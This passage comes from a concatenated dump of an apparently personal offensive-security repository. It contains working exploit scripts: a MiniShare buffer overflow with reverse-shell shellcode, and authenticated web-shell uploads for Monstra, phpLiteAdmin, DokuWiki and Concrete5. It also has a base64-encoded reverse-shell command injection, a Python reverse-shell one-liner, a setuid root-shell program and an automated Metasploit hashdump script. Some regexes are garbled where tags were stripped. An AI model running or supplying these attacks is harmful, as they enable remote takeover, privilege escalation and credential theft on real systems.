541 | fp.write('sysinfo\n')
542 | fp.write('run post/windows/gather/hashdump\n')
543 | fp.write('exit\n')
544 | fp.write('exit\n')
545 | fp.write('exit\n') # TODO: make-meterpreter-exit bug
546 |
547 |
548 | # reading loglines from output.www spool
549 | # TODO: grab details to exploit bugs and/or prepare summary
550 | def readSpoolWWW(RCfp):
551 | print '[+] Reading spool from : ', RCfp
552 | # TODO: tmp solution...
553 | fp = open(RCfp)
554 | lines = fp.readlines()
555 |
556 | for line in lines:
557 | if line.find('admin') != -1:
558 | print line
559 |
560 |
561 | print '[+] Finished reading spool from : ', RCfp
562 |
563 | # read loglines from output.msf spool
564 | # TODO: grab details to exploit bugs and/or prepare summary
565 | def readSpoolNet(RCfp):
566 | print '[+] Reading spool from : ', RCfp
567 |
568 | check_http_dirs(target)
569 |
570 | print '[+] Finished reading spool from : ', RCfp
571 |
572 | # run msfconsole with defined RC file
573 | def runMsfScan(RCfp):
574 | print '[i] Starting Metasploit with RC file : ', RCfp
575 | exe = 'msfconsole -r ' + RCfp
576 | subprocess.call([ exe ], shell=True)
577 | print '[+] Finished Metasploit tests for : ', RCfp
578 |
579 | # save line to RC file for 2nd msf run (www tests)
580 | def saveWWWRc(line):
581 | fp = open(rcwww, 'a+')
582 | fp.write(line)
583 |
584 | # save line to RC file for 1st msf run
585 | def saveNetRc(line):
586 | fp = open(rcfile, 'a+')
587 | fp.write(line)
588 |
589 | # read nmap output file
590 | # TODO: grab details from nmap log
591 | def readScan(nmaplogfile):
592 | print '[+] Reading scan log...'
593 |
594 | fp = open(nmaplogfile,'r')
595 | ports = fp.readlines()
596 |
597 | for port in ports:
598 | if port.find('open') != -1:
599 | tmp_port = port.split('/')
600 | global rport
601 | global targeturi # TODO !
602 | global tmpuri
603 | rport = tmp_port[0]
604 |
605 | if port.find('21/tcp') != -1:
606 | scannedPort += 1
607 | print '[i] FTP found on port : ', rport
608 | check_21(target)
609 | if port.find('Microsoft ftpd') != -1:
610 | print '[i] Probably Microsoft FTP; preparing...'
611 | check_21_ms(target)
612 |
613 | elif port.find('22/tcp') != -1:
614 | print '[i] SSH found on port :', rport
615 | check_22(target)
616 |
617 | elif port.find('http') != -1:
618 | print '[i] HTTP found on port: ', rport
619 | check_http(target, rport) # test for all http
620 | if port.find('Apache') != -1:
621 | print '[i] Probably Apache; preparing...'
622 | check_apache(target, rport)
623 | elif port.find('IIS') != -1:
624 | print '[i] Probably IIS; preparing...'
625 | check_iis(target, rport)
626 |
627 | elif port.find('111/tcp') != -1:
628 | print '[i] RPC found on port : ', rport
629 | check_111(target)
630 |
631 | elif port.find('135/tcp') != -1:
632 | print '[i] NetBios found on port: ', rport
633 | check_135(target)
634 |
635 | elif port.find('139/tcp') != -1:
636 | print '[i] SMB found on port: ', rport
637 | if port.find('Samba smbd') != -1:
638 | print '[i] Probably Linux Samba; preparing...'
639 | check_139_lin(target)
640 | check_139(target)
641 |
642 | elif port.find('443/tcp') != -1:
643 | print '[i] HTTPS found on port: ', rport
644 | check_https(target, rport)
645 |
646 |
647 | elif port.find('445/tcp') != -1:
648 | print '[i] MS-DC Active Directory found on port: ', rport
649 | check_445(target)
650 |
651 | elif port.find('2100/tcp') != -1:
652 | print '[i] Oracle found on port: ', rport
653 | check_2100(target)
654 |
655 | elif port.find('2869/tcp') != -1:
656 | print '[i] SSDP/UPnP found on port: ', rport
657 | check_2869(target)
658 |
659 | elif port.find('3632/tcp') != -1:
660 | print '[i] DistCC Daemon found on port: ', rport
661 | check_3632(target)
662 |
663 | elif port.find('5357/tcp') != -1:
664 | print '[i] SSDP/UPnP found on port: ', rport
665 | check_5357(target)
666 |
667 | saveNetRc('exit\n')
668 | saveWWWRc('exit\n')
669 | rport = ''
670 | print '\n[i] Reading log file : done.'
671 |
672 | # run nmap against IP and save output to nmap log
673 | def scan(target):
674 | print '[+] Scanning :', target
675 |
676 | exe = 'nmap -sV -T4 -A -Pn -vv -n ' + target + ' -oN ' + nmaplogfile
677 | print '[+] Started!'
678 | subprocess.call([ exe ], shell=True)
679 | print '[+] Finished.'
680 |
681 | # check for current RC, if any, move to .old
682 | def moveRc(fp):
683 | moveme = 'mv ' + str(fp) + ' ' + str(fp) + '.old'
684 | subprocess.call([ moveme], shell=True)
685 |
686 | # prepare environment; dirs, logs, etc...
687 | def prepareEnv():
688 | print '[+] Preparing environment...'
689 |
690 | # look for old RC files
691 | if os.path.exists(rcfile):
692 | print '[!] Old RC file found; moving...'
693 | moveRc(rcfile)
694 |
695 | if os.path.exists(rcwww):
696 | print '[!] Old WWW RC file found; moving...'
697 | moveRc(rcwww)
698 |
699 | # create log dirs
700 | print '[i] Checking for log directory : ' + allLogs
701 |
702 | if os.path.isdir(allLogs) != -1:
703 | try:
704 | os.mkdir(allLogs)
705 | print '[+] Log directory created : ' + allLogs
706 | except OSError, e:
707 | print '[+] Log directory is already there'
708 |
709 | print '[i] Checking target directory: ' + tLogDir
710 | if os.path.isdir(tLogDir) != -1:
711 | try:
712 | os.mkdir(tLogDir)
713 | print '[+] Directory for target should be here: ' + tLogDir
714 | except OSError, e:
715 | print '[+] Log directory for target is already created.'
716 |
717 | # preparing RC files (1st line 'spool' to log outputs)
718 | print '[i] Preparing RC files: '
719 | if os.path.isfile(rcfile) != -1:
720 | try:
721 | fp = open(rcfile,'a+')
722 | fp.write('spool ' + rcspool + '\n')
723 | print '[+] Network RC file created at : ' + rcfile
724 | except OSError, e:
725 | print e
726 | except IOError, e:
727 | print e
728 |
729 | if os.path.isfile(rcwww) != -1:
730 | try:
731 | fp = open(rcwww, 'a+')
732 | fp.write('spool ' + wwwspool + '\n')
733 | print '[+] HTTP RC file created at : ' + rcwww
734 | except OSError, e:
735 | print e
736 |
737 | # welcome msg + date
738 | # TODO: date to log/summary
739 | def sayHi():
740 | print ''
741 | print '*'*80
742 | print '\t\t\t\tgrabash.py'
743 | print '*'*80
744 | print ''
745 | print '[i] Test started : ', today
746 |
747 |
748 | # MAIN starter:
749 | # ...
750 | sayHi()
751 | prepareEnv()
752 | scan(target)
753 |
754 | readScan(nmaplogfile)
755 | runMsfScan(rcfile)
756 | readSpoolNet(rcspool)
757 |
758 | runMsfScan(rcwww)
759 | # readSpoolWWW(rcspool) # print all output.www
760 |
761 | thanks() # TODO: detailed summary
762 | #
763 | # more:
764 | # http://code610.blogspot.com
765 | #
766 | # cheers :)
767 |
768 |
769 |
--------------------------------------------------------------------------------
/greenshot--1.2.9.129-EXPLOITABLE.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/greenshot--1.2.9.129-EXPLOITABLE.zip
--------------------------------------------------------------------------------
/headHunter.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # headHunter.py - small script to check few headers for
3 | # buggy server configuration.
4 | # @22.10.2016
5 | # based on 'python web penetration testing cookbook'
6 | #
7 | import requests
8 | import sys
9 |
10 | GREEN = '\033[92m'
11 | YELLOW = '\033[93m'
12 | ENDC = '\033[0m'
13 | RED = '\033[31m'
14 |
15 | target = str(sys.argv[1])
16 | print '\n\t ( headHunter.py - find buggy headers )\n'
17 |
18 | print '[+] Checking : ' + GREEN + target + ENDC + '\n'
19 |
20 | req = requests.get(target)
21 |
22 | try:
23 | xssprotect = req.headers['X-XSS-Protection']
24 | if xssprotect != '1; mode=block':
25 | print RED + ' [bug] X-XSS-Protection not set properly, XSS may be possible: ' + xssprotect + ENDC
26 | except:
27 | print RED + ' [bug] X-XSS-Protection not set, XSS may be possible' + ENDC
28 |
29 | try:
30 | contenttype = req.headers['X-Content-Type-Options']
31 | if contenttype != 'nosniff':
32 | print RED+ ' [bug] X-Content-Type-Options not set properly: ' + contenttype + ENDC
33 | except:
34 | print RED + ' [bug] X-Content-Type-Options not set' + ENDC
35 |
36 | try:
37 | hsts = req.headers['Strict-Transport-Security']
38 | except:
39 | print RED + ' [bug] HSTS header not set, MITM attacks may be possible' + ENDC
40 |
41 | try:
42 | csp = req.headers['Content-Security-Policy']
43 | print YELLOW + ' [info] Content-Security-Policy set:'+csp + ENDC
44 | except:
45 | print RED + ' [bug] Content-Security-Policy missing' + ENDC
46 |
47 | try:
48 | srv = req.headers['Server']
49 | print YELLOW + ' [info] Server set:' + srv + ENDC
50 | except:
51 | print YELLOW + ' [info] Server header not found' + ENDC
52 |
53 | try:
54 | dat = req.headers['Date']
55 | print YELLOW + ' [info] Date set: ' + dat + ENDC
56 | except:
57 | pass
58 |
59 | try:
60 | crossdomain = req.headers['Access-Control-Allow-Origin'] # if set to '*' = bug
61 | print YELLOW+' [info] Access-Control-Allow-Origin set:' + crossdomain + ENDC
62 | except:
63 | print YELLOW+' [info] Access-Control-Allow-Origin missing' + ENDC
64 |
65 | try:
66 | xcsp = req.headers['X-Content-Security-Policy']
67 | print YELLOW+' [info] X-Content-Security-Policy set:'+ xcsp + ENDC
68 | # specify per-document, the ability to perform actions
69 | # that would normally be permitted under SOP.
70 | except:
71 | print YELLOW+' [info] X-Content-Security-Policy missing' + ENDC
72 |
73 | try:
74 | print YELLOW+' [info] X-Frame-Options presented, clickjacking not likely possible' + ENDC
75 | except:
76 | print RED + ' [bug] X-Frame-Options missing - clickjacking possible' + ENDC
77 |
78 |
79 | # TODO: add more headers...
80 | print '\n[+] Test finished.\n'
81 |
82 |
83 |
--------------------------------------------------------------------------------
/ispsoft-01-0x5b1061e7.0xaf639cc8.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/ispsoft-01-0x5b1061e7.0xaf639cc8.zip
--------------------------------------------------------------------------------
/ispsoft-02-0x5b1061e7.0x630e8926.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/ispsoft-02-0x5b1061e7.0x630e8926.zip
--------------------------------------------------------------------------------
/meshell.py:
--------------------------------------------------------------------------------
1 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.111.185.17",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
--------------------------------------------------------------------------------
/mini-poc.py:
--------------------------------------------------------------------------------
1 | c@kali:~/src/$ cat minishare141-win7ultip0c-2.py
2 | #!/usr/bin/env python
3 | import sys, socket
4 |
5 | target = sys.argv[1]
6 | port = 80
7 |
8 | print '[+] checking:', target
9 |
10 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
11 | s.connect((target, port))
12 | #shellcode = ""
13 |
14 | buffer = "GET "
15 | padding = "A" * 1787 # [*] Exact match at offset 1787
16 | ret_addr = "\x71\xe8\x58\x77" # search for jmpesp in modules
17 | nopsss = "\x90" * 26
18 |
19 | # c@kali:~/src/oscp$ msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.183
20 | # LPORT=4444 -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai
21 | # x86/shikata_ga_nai chosen with final size 360
22 | # Payload size: 360 bytes
23 | shellcode = ""
24 | shellcode += "\xd9\xc5\xbd\x4d\x99\xdc\x16\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
25 | shellcode += "\x54\x83\xea\xfc\x31\x6a\x14\x03\x6a\x59\x7b\x29\xea\x89\xf9"
26 | shellcode += "\xd2\x13\x49\x9e\x5b\xf6\x78\x9e\x38\x72\x2a\x2e\x4a\xd6\xc6"
27 | shellcode += "\xc5\x1e\xc3\x5d\xab\xb6\xe4\xd6\x06\xe1\xcb\xe7\x3b\xd1\x4a"
28 | shellcode += "\x6b\x46\x06\xad\x52\x89\x5b\xac\x93\xf4\x96\xfc\x4c\x72\x04"
29 | shellcode += "\x11\xf9\xce\x95\x9a\xb1\xdf\x9d\x7f\x01\xe1\x8c\xd1\x1a\xb8"
30 | shellcode += "\x0e\xd3\xcf\xb0\x06\xcb\x0c\xfc\xd1\x60\xe6\x8a\xe3\xa0\x37"
31 | shellcode += "\x72\x4f\x8d\xf8\x81\x91\xc9\x3e\x7a\xe4\x23\x3d\x07\xff\xf7"
32 | shellcode += "\x3c\xd3\x8a\xe3\xe6\x90\x2d\xc8\x17\x74\xab\x9b\x1b\x31\xbf"
33 | shellcode += "\xc4\x3f\xc4\x6c\x7f\x3b\x4d\x93\x50\xca\x15\xb0\x74\x97\xce"
34 | shellcode += "\xd9\x2d\x7d\xa0\xe6\x2e\xde\x1d\x43\x24\xf2\x4a\xfe\x67\x9a"
35 | shellcode += "\xbf\x33\x98\x5a\xa8\x44\xeb\x68\x77\xff\x63\xc0\xf0\xd9\x74"
36 | shellcode += "\x27\x2b\x9d\xeb\xd6\xd4\xde\x22\x1c\x80\x8e\x5c\xb5\xa9\x44"
37 | shellcode += "\x9d\x3a\x7c\xf0\x97\xac\xbf\xad\xa9\x9b\x28\xac\xa9\xf2\xf4"
38 | shellcode += "\x39\x4f\xa4\x54\x6a\xc0\x04\x05\xca\xb0\xec\x4f\xc5\xef\x0c"
39 | shellcode += "\x70\x0f\x98\xa6\x9f\xe6\xf0\x5e\x39\xa3\x8b\xff\xc6\x79\xf6"
40 | shellcode += "\x3f\x4c\x88\x06\xf1\xa5\xf9\x14\xe5\xd7\x01\xe5\xf5\x7d\x02"
41 | shellcode += "\x8f\xf1\xd7\x55\x27\xfb\x0e\x91\xe8\x04\x65\xa1\xef\xfa\xf8"
42 | shellcode += "\x90\x84\xcc\x6e\x9d\xf2\x30\x7f\x1d\x03\x66\x15\x1d\x6b\xde"
43 | shellcode += "\x4d\x4e\x8e\x21\x58\xe2\x03\xb7\x63\x53\xf7\x10\x0c\x59\x2e"
44 | shellcode += "\x56\x93\xa2\x05\xe5\xd4\x5d\xdb\xcb\x7c\x36\x23\x4b\x7d\xc6"
45 | shellcode += "\x49\x4b\x2d\xae\x86\x64\xc2\x1e\x66\xaf\x8b\x36\xed\x21\x79"
46 | shellcode += "\xa6\xf2\x68\xdf\x76\xf2\x9e\xc4\x6f\x7d\x61\xfb\x8f\x7f\x5e"
47 | shellcode += "\x2d\xb6\xf5\xa7\xed\x8d\x06\x92\x50\xa7\x8c\xdc\xc7\xb7\x84";
48 |
49 | endreq = " HTTP/1.1\r\n\r\n"
50 |
51 | payload = buffer + padding + ret_addr + nopsss + shellcode + endreq
52 |
53 | s.send(payload)
54 | s.close()
55 |
56 |
57 | c@kali:~/src/$
58 |
--------------------------------------------------------------------------------
/modus-0.7.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/modus-0.7.zip
--------------------------------------------------------------------------------
/monstrauuuu.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # monstrauuuu.py - postauth poc to upload shell in monstra cms 3.0.4
3 | # similar to : CVE-2018-9037
4 | #
5 | import requests
6 | import sys
7 | import re
8 |
9 | target = sys.argv[1]
10 | sess = requests.session()
11 | sesslink = target + '/monstra/admin/'
12 |
13 | logmein = {
14 | 'login':'admin',
15 | 'password':'admin',
16 | 'login_submit':'Log+In'
17 | }
18 |
19 | login_link = sesslink
20 | doLogin = sess.post(login_link, data=logmein)
21 | loginResp = doLogin.text
22 |
23 | if 'Monstra :: Administration' in loginResp:
24 | print '[+] the way I see IT, _we_ can do whatever we want'
25 |
26 | # grab csrf token to send with file
27 | tokenLink = target + '/monstra/admin/index.php?id=plugins'
28 | getToken = sess.get(tokenLink)
29 | gotTokenResp = getToken.text
30 |
31 | if 'csrf' in gotTokenResp:
32 | find_token = re.compile( 'name="csrf" value="(.*?)">' )
33 | found_token = re.search(find_token, gotTokenResp)
34 |
35 | if found_token:
36 | token = found_token.group(1)
37 | print '[+] CSRF grabbed, using %s' % ( token )
38 |
39 | # preparing upload file now
40 | fin = open('mishell.zip','rb')
41 | files = {'file': fin}
42 |
43 | shell_data = {
44 | 'csrf':token,
45 | 'file':files,
46 | 'upload_file':'Upload',
47 | }
48 |
49 | req = sess.post(tokenLink, data=shell_data, files=files)
50 | #print req.text
51 | print '[+] high, is there Mishell?'
52 |
53 | tmp1 = target + '/monstra/tmp/'
54 | req1 = requests.get(tmp1)
55 | resp1 = req1.text
56 |
57 | find_plugDir = re.compile('')
58 | found_plugDir = re.search(find_plugDir, resp1)
59 |
60 | if found_plugDir:
61 | plugin_dir = '/plugin_' + found_plugDir.group(1)
62 | print '[+] meshell found in %s' % ( plugin_dir)
63 |
64 | print '[+] Verifying...'
65 | finLink = target + '/monstra/tmp/' + plugin_dir + '/mishell.php?xx=id;w;pwd'
66 | finish = requests.get(finLink)
67 | finish_resp = finish.text
68 |
69 |
70 | print '[+] shelling Monstraaaaaaaaaauuuuuuuuuuu! \o/ \n'
71 | print finish_resp
72 |
73 | print '\no/'
74 |
75 |
76 | ##
77 | #
78 |
79 |
--------------------------------------------------------------------------------
/msaccess2010-vs-15_22.12.2017-n19.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/msaccess2010-vs-15_22.12.2017-n19.zip
--------------------------------------------------------------------------------
/mspaint-xpsp3-crash-int-poc.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/mspaint-xpsp3-crash-int-poc.ico
--------------------------------------------------------------------------------
/mspub-2010-16-part02.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/mspub-2010-16-part02.7z
--------------------------------------------------------------------------------
/mspub10-16-pocs.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/mspub10-16-pocs.7z
--------------------------------------------------------------------------------
/mspub2010-vs-15_22.12.2017-n8.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/mspub2010-vs-15_22.12.2017-n8.zip
--------------------------------------------------------------------------------
/photoshop-cs3-portable.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/photoshop-cs3-portable.zip
--------------------------------------------------------------------------------
/phplightadmin.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # phplightadmin.py - phpLiteAdmin postauth RCE poc
3 | #
4 | # based on public bug + default credentials (EDB-ID: 24044)
5 | # 24.02.2019@12:38
6 | #
7 |
8 | import requests
9 | import sys
10 |
11 | target = 'http://' + sys.argv[1]
12 | full_url = target + '/dbadmin/test_db.php'
13 |
14 | login_data = {
15 | 'password':'admin',
16 | 'rememberme':'yes',
17 | 'login':'Log In'
18 | }
19 |
20 | sess = requests.session()
21 | req = sess.post(full_url, data=login_data)
22 | resp = req.text
23 |
24 | if 'Documentation' in resp:
25 | print '[+] admin user logged-in!'
26 | print '[i] preparing shell DB'
27 |
28 | createNewDbLink = target + '/dbadmin/test_db.php'
29 | createPostDB = {
30 | 'new_dbname':'shellme5.php',
31 | 'submit':'Create'
32 | }
33 |
34 | do_create = sess.post(createNewDbLink, data=createPostDB)
35 | createResp = do_create.text
36 |
37 | if 'shellme5.php' in createResp:
38 | print '[+] shell created!!'
39 |
40 | # geto to create table
41 | init_table = target + '/dbadmin/test_db.php?switchdb=/usr/databases/shellme5.php'
42 | init_req = sess.get(init_table)
43 | init_resp = init_req.text
44 |
45 | # creating table
46 | table_link = target + '/dbadmin/test_db.php?action=table_create'
47 | table_data = {
48 | 'tablename':'testing1',
49 | 'tablefields':'1',
50 | 'createtable':'Go'
51 | }
52 | do_table = sess.post(table_link, data=table_data)
53 | do_tableResp = do_table.text
54 |
55 | if 'Creating new table' in do_tableResp:
56 | print '[+] looks like table is created. so far so good!'
57 |
58 | # inject phpcode
59 | inphplink = target + '/dbadmin/test_db.php?action=table_create&confirm=1'
60 | inphplink_data = {
61 | 'tablename':'testing1',
62 | 'rows':'1',
63 | '0_field':'sasasasasasasasasasasa',
64 | '0_type':'INTEGER',
65 | '0_defaultvalue':''
66 | }
67 | inphpdo = sess.post(inphplink, data=inphplink_data)
68 | inphpdoresp = inphpdo.text
69 |
70 | if 'has been created' in inphpdoresp:
71 | print '[+] table injected; check your shell now...'
72 |
73 | verifymishell = sess.get(target + '/view.php?page=../../../../../../../../../usr/databases/shellme5.php&xxx=id')
74 | cmdresp = verifymishell.text
75 |
76 | print ']:>'
77 | print ''
78 | print cmdresp
79 | print ''
80 | print ']:>'
81 |
82 |
83 | print '\n[+] script finished.'
84 |
85 | # topa
86 | #
--------------------------------------------------------------------------------
/pma-shell.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | import urllib2, urllib, cookielib
4 | import string
5 |
6 | base = u'http://192.168.56.101/pma/phpMyAdmin-4.6.2-all-languages/'
7 | query = 'select "Load Balancer Administration System' in logmeresp:
67 | print '[+] using credentials: %s : %s' % ( our_user, our_passwd )
68 | print '[+] our timestamp: %s' % ( timestamp )
69 |
70 | print '[+] proceed.'
71 |
72 | getme = remote_host + '/lbadmin/config/changeip.php?action=modip&l=e&t=' + str(timestamp)
73 | dogetme = sess.get(getme, auth=HTTPBasicAuth(our_user, our_passwd))
74 | getmeresp = dogetme.text
75 |
76 |
77 | payload = "h4x;echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9J TkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4xLjE2MCIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3 MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk7Jwo= | base64 -d | sh;#"
78 |
79 | #payload = "h4x;telnet 192.168.1.160 4444;#"
80 | #payload = ';id>/tmp/id.id.id'
81 | # print '[i] using payload:', payload
82 |
83 | data_req = {
84 | 'eth0' : '192.168.1.126/24',
85 | 'mtu_eth0' : '1500' + payload, # >.<
86 | 'eth1' : '',
87 | 'mtu_eth1' : '1500',
88 | 'eth2' : '',
89 | 'mtu_eth2' : '1500',
90 | 'eth3' : '',
91 | 'mtu_eth3' : '1500',
92 | 'go' : 'Configure+Interfaces'
93 | }
94 | shLink = remote_host + '/lbadmin/config/changeip.php?action=modip&l=e&t=' + str(timestamp)
95 | shellWe = sess.post(shLink, data=data_req, auth=HTTPBasicAuth(our_user, our_passwd))
96 | shResp = shellWe.text
97 |
98 | # check sudo -l now :>
99 | print '\n\nThanks.Bye.\n'
100 |
101 |
102 |
--------------------------------------------------------------------------------
/real18-unknown-0xb4630163.0xcf34cbfe.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/real18-unknown-0xb4630163.0xcf34cbfe.zip
--------------------------------------------------------------------------------
/setuidsh.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | int main(void) {
4 | setuid(0);
5 | setgid(0);
6 | seteuid(0);
7 | setegid(0);
8 | system("cp /bin/sh /tmp/rap;chmod u+s /tmp/rap;id");
9 | }
10 |
--------------------------------------------------------------------------------
/sf_2ae2099082c3456c21190dd78bfbdfae-8680-0x0efa9000-minimized.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/sf_2ae2099082c3456c21190dd78bfbdfae-8680-0x0efa9000-minimized.zip
--------------------------------------------------------------------------------
/sf_2ae2099082c3456c21190dd78bfbdfae.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/sf_2ae2099082c3456c21190dd78bfbdfae.zip
--------------------------------------------------------------------------------
/shel-dokuwiki.py:
--------------------------------------------------------------------------------
1 | c@kali:~/src/napalm2.2/modules$ cat shell-dokuwiki.py
2 | #!/usr/bin/env python
3 | # shell-dokuwiki.py - module to upload shell, based on previous version
4 | # created 28.04.2017. Bug ('feature') is exploitable only
5 | # when you will have a valid credentials.
6 | # for this proof-of-concept you'll also need host with you.r/shell.zip
7 | #
8 |
9 | import sys
10 | import re
11 | import requests
12 |
13 | print '[+] Module : dokuwiki - started.'
14 |
15 | print
16 | target = raw_input("[+] Hostname> ")
17 | logMe = target + '/doku.php?id=start&do=login§ok='
18 | print
19 |
20 | session = requests.session()
21 | login_data = dict(u='user', p='bitnami')
22 | req = session.post(logMe, data=login_data)
23 |
24 | # 2nd req:
25 | afterPage = target + '/doku.php?id=start&do=admin&page=extension&tab=install'
26 | req2 = session.get(afterPage)
27 |
28 | resp = req2.text
29 | if 'Log Out' in resp:
30 | print '[+] We are logged-in as admin. Preparing shell...'
31 |
32 |
33 | req3 = session.get(afterPage)
34 | resp3 = req3.text
35 |
36 | pattern = re.compile('')
37 | found = re.search(pattern, resp3)
38 |
39 | if found:
40 | sectok = found.group(1)
41 | print '[+] Found "sectok":' + str( sectok )
42 | print '[+] Preparing shell params to upload'
43 |
44 | data_shell = {
45 | 'sectok':sectok,
46 | 'installurl':'http://192.168.1.205/mishell.zip'
47 | }
48 | reqshell = session.post(afterPage, data=data_shell)
49 | respshell = reqshell.text
50 |
51 | md5name = re.compile(' Plugin (.*?) installed successfully ')
52 | foundmishell = re.search(md5name, respshell)
53 |
54 | if foundmishell:
55 | print '[+] Mishell name:' + str( foundmishell.group(1))
56 |
57 | shellUrl = target + '/lib/plugins/'+foundmishell.group(1)+'/mishell.php?x=id;uname -a'
58 | verify = session.get(shellUrl)
59 | vtext = verify.text
60 |
61 | print ' ',vtext
62 | print ''
63 | print '[+] Your shell should be here:', shellUrl
64 |
65 | ## can not log in
66 | else:
67 | print '[-] Can not login. Something is wrong :C'
68 |
69 |
70 | print '[+] Module : dokuwiki - finished.'
71 |
72 |
--------------------------------------------------------------------------------
/shell-concrete5.py:
--------------------------------------------------------------------------------
1 | c@kali:~/src/napalm2.2/modules$ cat shell-concrete5.py
2 | #!/usr/bin/env python
3 | # shell-concrete5.py - module based on previous version
4 | # created 29.04.2017. Bug ('feature') is exploitable only
5 | # when you will have a valid credentials.
6 | import sys
7 | import re
8 | import requests
9 |
10 | target = raw_input("[+] Hostname> ")
11 | logMe = target + '/index.php/login'
12 | session = requests.session()
13 |
14 | initreq = session.get(logMe)
15 | initresp = initreq.text
16 |
17 | gettoken = re.compile('')
18 | found = re.search(gettoken, initresp)
19 |
20 | if found:
21 | token = found.group(1)
22 | print '[+] Found token: ' + str(token)
23 |
24 |
25 | # assuming token is valid, let's log in
26 | login_data = {
27 | 'uName':'user',
28 | 'uPassword':'bitnami',
29 | 'ccm_token':token
30 | }
31 | loglink = target + '/index.php/login/authenticate/concrete'
32 | loginreq = session.post(loglink, data=login_data)
33 |
34 | #afterlogin = target + '/index.php/dashboard/system'
35 | afterlogin = target + '/index.php/dashboard/system/files/filetypes'
36 | nextreq1 = session.get(afterlogin)
37 | nextresp1 = nextreq1.text
38 | print '[+] Cool, we\'re logged-in!'
39 | #print afterlogin
40 | #print nextresp1
41 | print '[+] We are ready to go, extension-page is available.'
42 | print ''
43 |
44 | # construct POST with new.ext
45 | newToken = re.compile('')
46 | foundToken = re.search(newToken, nextresp1)
47 |
48 | if foundToken:
49 | newOne = foundToken.group(1)
50 | print '[+] New token grabbed: ' + str(newOne)
51 |
52 | data_ext = {
53 | 'ccm_token':newOne,
54 | 'file-access-file-types':'mov,asp,html,yyyy,zzzz,php,newone'
55 | }
56 | datalink = target + '/index.php/dashboard/system/files/filetypes/file_access_extensions'
57 | datareq = session.post(datalink, data=data_ext)
58 | dataresp = datareq.text
59 | nowwecan = re.compile('file-access-file-types" class="form-control" rows="3">(.*?)')
60 | newexts = re.search(nowwecan, dataresp)
61 |
62 | if newexts:
63 | print '[+] Available now: '+ newexts.group(1)
64 |
65 | print '[+] Time to upload shell...'
66 |
67 | # next token to upload request
68 | nextTokenUrl = target + '/index.php/tools/required/files/import?currentFolder=0'
69 | tokreq3 = session.get(nextTokenUrl)
70 | tokresp3 = tokreq3.text
71 |
72 | grabNextTok = re.compile('input type="hidden" name="ccm_token" value="(.*?)"/>')
73 | foundit = re.search(grabNextTok, tokresp3)
74 |
75 | if foundit:
76 | tokentoup = foundit.group(1)
77 | print '[+] Next token (3rd): ' + str( tokentoup )
78 |
79 | # we are logged-in; preparing req to upload shell
80 | saymyname = 'meshell3.php'
81 |
82 | fp = open(saymyname,'w')
83 | fp.write(''
116 | whereareu = re.compile(whereareutxt)
117 | foundme2 = re.search(whereareu, prepresp)
118 |
119 | if foundme2:
120 | print '[+] Shell is ready to use:'
121 | shellshere = target + '/application/files/' + foundme2.group(2) + '/'+saymyname + '?xx=id;cat ../../../../config/database.php'#id'
122 | print ' ' + shellshere
123 |
124 | print '[+] "Finish him!" ;7'
125 | finish = session.get(shellshere)
126 | fintxt = finish.text
127 | print '[+] Response:'
128 | print fintxt
129 | print '\n---------------'
130 |
131 | else:
132 | print '[-] I can not upload our shell. Verify!'
133 |
134 |
135 |
--------------------------------------------------------------------------------
/shell-joomla.py:
--------------------------------------------------------------------------------
1 |
2 | c@kali:~/src/napalm2.2/modules$ cat shell-joomla.py
3 | #!/usr/bin/env python
4 | # joomla_shellup.py - small script to upload shell in Joomla
5 | #
6 | # 02.05.2017, rewrited: 27.05
7 | # -- hint --
8 | # To exploit this "feature" you will need valid credentials.'
9 | # Based on latest (3.6.5-1) version.'
